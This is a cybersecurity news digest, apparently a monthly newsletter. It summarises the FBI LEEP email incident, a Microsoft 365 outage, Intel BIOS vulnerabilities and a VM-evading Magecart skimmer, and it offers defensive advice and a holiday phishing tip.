FBI Email System Hacked

Summary: On the evening of November 12, phony emails were sent out to tens of thousands of addresses from the FBI’s Law Enforcement Enterprise Portal. Per the website, “the Law Enforcement Enterprise Portal (LEEP) is a secure platform for law enforcement agencies, intelligence groups, and criminal justice entities.” Although the recipients of the emails were not specified, it is likely they fall under those categories.

The threat actor was identified as pompompurin via an email exchange they had with security researcher Krebs on Security. Insecure code on the website allowed the hacker to exploit a flaw in the LEEP registration process involving a one-time code sent via email. By altering the script, they were able to replace the email contents with their own material. The purpose of the attack is two-fold: to discredit white hat hacker and security researcher Vinny Troia, who was named in the email, and to shed light on the FBI’s lack of web security. The FBI released an official statement on the 14th confirming the incident and resolution.

Why it matters:  Security needs to be emphasized at every layer in an organization, from employees to infrastructure. Oftentimes, websites are not built with security in mind, but including secure coding at every step of the software development lifecycle is crucial.

The Open Web Application Security Project’s Top Ten Application Security Risks provides a framework for developing a secure code that minimizes risk of exploitation. In this example, the script input was not sanitized properly, allowing pompompurin to insert their own text. Lack of input validation can lead to other injection attacks that may grant access to sensitive information. Additionally, despite LEEP’s purpose as a resource for government agencies, no restrictions were in place to prevent non-unauthorized persons from registering for an account. Proper access control is crucial when dealing with data.

Microsoft 365 Outage

Summary: On November 2nd users were reporting they no longer had access to Excel files stored on Microsoft OneDrive and SharePoint. Microsoft then issued an Office 365 service alert stating that the “impacted services may include, but aren’t limited to, SharePoint Online, OneDrive for Business, Microsoft Teams, and Microsoft 365 apps.”

After an investigation took place, Microsoft concluded the root cause was a patch for an unrelated fix implemented earlier that day. This resulted in the issues many users were bringing up on social media. At approximately 1 PM Eastern Time, Microsoft announced, “We identified that a recently deployed code change that was intended to address a separate issue resulted in impact” … “We reverted the offending change and monitored the service to confirm that this has resolved the problem. Users may need to refresh their web browser or restart their app to see resolution.”

Why it matters:

Thankfully, this issue was resolved the day it appeared. However, this highlights one core tenant of the cyber security: Confidentiality, Integrity, and Availability (CIA) triad as well as the 3-2-1 backup practiceThe Availability focus ensures that data and systems are up, operational, and can be accessed by users when needed. The 3-2-1 backup practice, this best practice maintains that 3 copies of your data should exist:

  • 1 is in production and used every day
  • 2 are copies in differing locations
    • 1 cold backup on physical storage in an offsite location
    • 1 in the cloud or a Network Accessible Storage device

As many companies employ the use of Windows machines with Microsoft Office, the simplest way to implement cloud storage is via OneDrive and SharePoint. They natively support all the Office applications and seamlessly integrate into the environment. This is where the issue lies: all these applications and the cloud service are offered by Microsoft. This dependence on all Microsoft services results in a single point of failure.

It is important to remember that when it comes to ensuring backups exist that you maintain off-site cold storage. While slow, resource intensive, and sometimes costly, it is critical to keep this option open in the event of a critical loss of data or event resulting in extended inaccessibility.

High Severity BIOS Flaws Affect Numerous Intel Processors

Summary: On November 9th, Intel released a BIOS Reference Code Advisory for two vulnerabilities “discovered by SentinelOne and are tracked as CVE-2021-0157 and CVE-2021-0158, and both have a CVSS v3 score of 8.2 (high)”. The two concerns emanate from insufficient control management and input validation, respectively. An attacker could use these to escalate privileges to a remarkably high level and establish persistence on a machine.

The processors affected were various Intel Xeon Processors, 11th Generation Intel Core Processors, 10th Generation Intel Core Processors, 7th Generation Intel Core Processors, Intel Core X-series Processors, Intel Celeron Processor N Series, and Intel Pentium Silver Processor Series. One key detail is that in order to take advantage of the flaws discovered, an attacker will require physical access to a machine. This gives users ample time to update BIOS and ensure the systems are not vulnerable. However, the 7th generation Intel processors were released 5 years ago. Most motherboard manufacturers do not support BIOS updates that far into the future for a motherboard. As such, some systems may not receive any BIOS security updates leaving users without a viable fix.

Why it matters: As these concerns require an attacker to have physical access to a system, most users and companies might consider this to be a non-threat. However, this highlights the CIA triad tenant of Accessibility. Not only should data be accessible to users, but those who have access is also of vital importance.

Well defended servers are no match to an attacker that can stroll into a server room and plug into the server physically. Physical security is important when cyber security is discussed. Whether security to sensitive areas is by key, access codes, proxy cards, or biometric scanners, having multiple ways of validating a user’s identity before they even have physical access to a machine is vital.

Additionally, just because someone has permission to access a place with higher clearance does not mean that they are authorized to interact with a machine present. Janitorial, maintenance, HVAC, and other staff might be authorized in but not to access a device. A coworker could easily browse the internet using your device resulting in those actions being attributed to you, regardless of how benign the activity. Actions taken by a machine can be attributed to a device, but not always the user at the keyboard. Therefore, it is important that all users lock their devices every time they get up and leave their workstation.

Magecart Credit Card Skimmer Evades Researchers to Target Victims

Summary: On November 7, Threatpost reported a sophisticated new threat actor that detects Virtual Machines and other sandbox tools used by researchers to evade discovery and steal credit card information from unsuspecting victims. Magecart is a skimming attack that intercepts the transmission of electronic payment data during online checkout via code injection on vulnerable websites. The script in question performs a browser check to determine whether the host device is a virtual machine by identifying the graphics renderer. If no virtual machine is detected, the skimmer collects the data and sends it to the attacker via a POST request.

Why it matters: Attackers are adapting their techniques to avoid detection by trained professionals. Often times professionals will utilize virtual machines to observe an attacker’s techniques and methodologies, by scanning the system the attackers are able to more accurately determine if they are being observed. Skimmers such as q-logger use encoding and obscure JavaScript to hide their tracks. Additionally, they have adapted to using numerous domains and content delivery networks to hide their origin. Magecart and other injection attacks typically target systems running out-of–date software or insecure code. Be sure to update your systems and employ defense-in-depth as much as possible. Malwarebytes has compiled a list of indicators of compromise (IOCs) associated with a Magecart attack.



Security Tip of the Month

As we move into December, holiday shopping is well under way and with it comes the need for secure purchasing. Attackers can take advantage of the urgency of shopping for the holidays and send out targeted phishing attempts purporting to be from retailers or shipping companies. These phishing attempts can be delivered via email or, more increasingly, through SMS. Krebs on Security wrote a blog post on a FedEx smishing scam that included a link viewable only on mobile devices requesting personal and financial information to “reschedule delivery” of a lost package.

Exercise caution when clicking on links in emails or text messages. When possible, navigate directly to the official website instead. Be wary of shopping on unfamiliar sites and of deals that appear too good to be true. When entering sensitive information like credit card data and addresses, make sure there is a padlock next to the website URL that indicates the connection is secure. Take care when navigating to a website as threat actors may typo squat and take advantage of mistyped URLs to lead users to a malicious webpage. Review your credit card statements for unknown transactions and report any suspicious activity to your bank.